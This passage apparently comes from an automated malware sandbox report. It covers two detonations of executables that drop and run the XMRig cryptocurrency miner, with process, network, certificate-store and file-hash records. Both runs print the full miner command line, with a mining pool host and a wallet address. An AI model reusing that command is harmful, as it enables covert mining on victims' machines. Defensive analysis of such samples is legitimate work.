memory/916-52-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-53-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-54-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-55-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-56-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-57-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-58-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-59-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-60-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-61-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-62-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-63-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-64-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-65-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-66-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-67-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-68-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-69-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-70-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-71-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-72-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-73-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-74-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-75-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-76-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-77-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-78-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-79-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-80-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-81-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-82-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-83-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
memory/916-84-0x00007FF6E2F90000-0x00007FF6E3A93000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 20:04
Platform
win10v2004-20240508-en
Max time kernel
1800s
Max time network
1797s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2820 wrote to memory of 4504 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2820 wrote to memory of 4504 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (9).exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.173.189.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/4504-16-0x0000027E28150000-0x0000027E28170000-memory.dmp
memory/4504-17-0x0000027E29A40000-0x0000027E29A60000-memory.dmp
memory/4504-18-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-20-0x0000027E29A60000-0x0000027E29A80000-memory.dmp
memory/4504-19-0x0000027E29A80000-0x0000027E29AA0000-memory.dmp
memory/4504-21-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-22-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-23-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-25-0x0000027E29A60000-0x0000027E29A80000-memory.dmp
memory/4504-24-0x0000027E29A80000-0x0000027E29AA0000-memory.dmp
memory/4504-26-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-27-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-28-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-29-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-30-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-31-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-32-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-33-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-34-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-35-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-36-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-37-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-38-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-39-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-40-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-41-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-42-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-43-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-44-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-45-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-46-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-47-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-48-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-49-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-50-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-51-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-52-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-53-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-54-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-55-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-56-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-57-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-58-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-59-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-60-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-61-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-62-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-63-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-64-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-65-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-66-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-67-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-68-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-69-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-70-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-71-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-72-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-73-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-74-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-75-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-76-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-77-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-78-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-79-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-80-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-81-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-82-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-83-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
memory/4504-84-0x00007FF6AEEE0000-0x00007FF6AF9E3000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 18:52
Reported
2024-05-22 19:41
Platform
win10v2004-20240426-en
Max time kernel
1798s
Max time network
1790s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2268 wrote to memory of 3148 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
| PID 2268 wrote to memory of 3148 | N/A | C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe
"C:\Users\Admin\AppData\Local\Temp\main - Copy (2) - Copy.exe"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| NL | 23.62.61.129:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.72:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 95.179.241.203:80 | pool.hashvault.pro | tcp |
| US | 8.8.8.8:53 | 203.241.179.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 30.73.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe
| MD5 | e2fe87cc2c7dab8ca6516620dccd1381 |
| SHA1 | f714ec0448325435103519452610cf7aadf8bbba |
| SHA256 | d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4 |
| SHA512 | 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6 |
memory/3148-16-0x0000026ACB3A0000-0x0000026ACB3C0000-memory.dmp
memory/3148-17-0x0000026ACCBA0000-0x0000026ACCBC0000-memory.dmp
memory/3148-18-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-19-0x0000026ACCBC0000-0x0000026ACCBE0000-memory.dmp
memory/3148-20-0x0000026ACCBE0000-0x0000026ACCC00000-memory.dmp
memory/3148-21-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-22-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
memory/3148-23-0x0000026ACCBC0000-0x0000026ACCBE0000-memory.dmp
memory/3148-25-0x0000026ACCBE0000-0x0000026ACCC00000-memory.dmp
memory/3148-24-0x00007FF600AF0000-0x00007FF6015F3000-memory.dmp
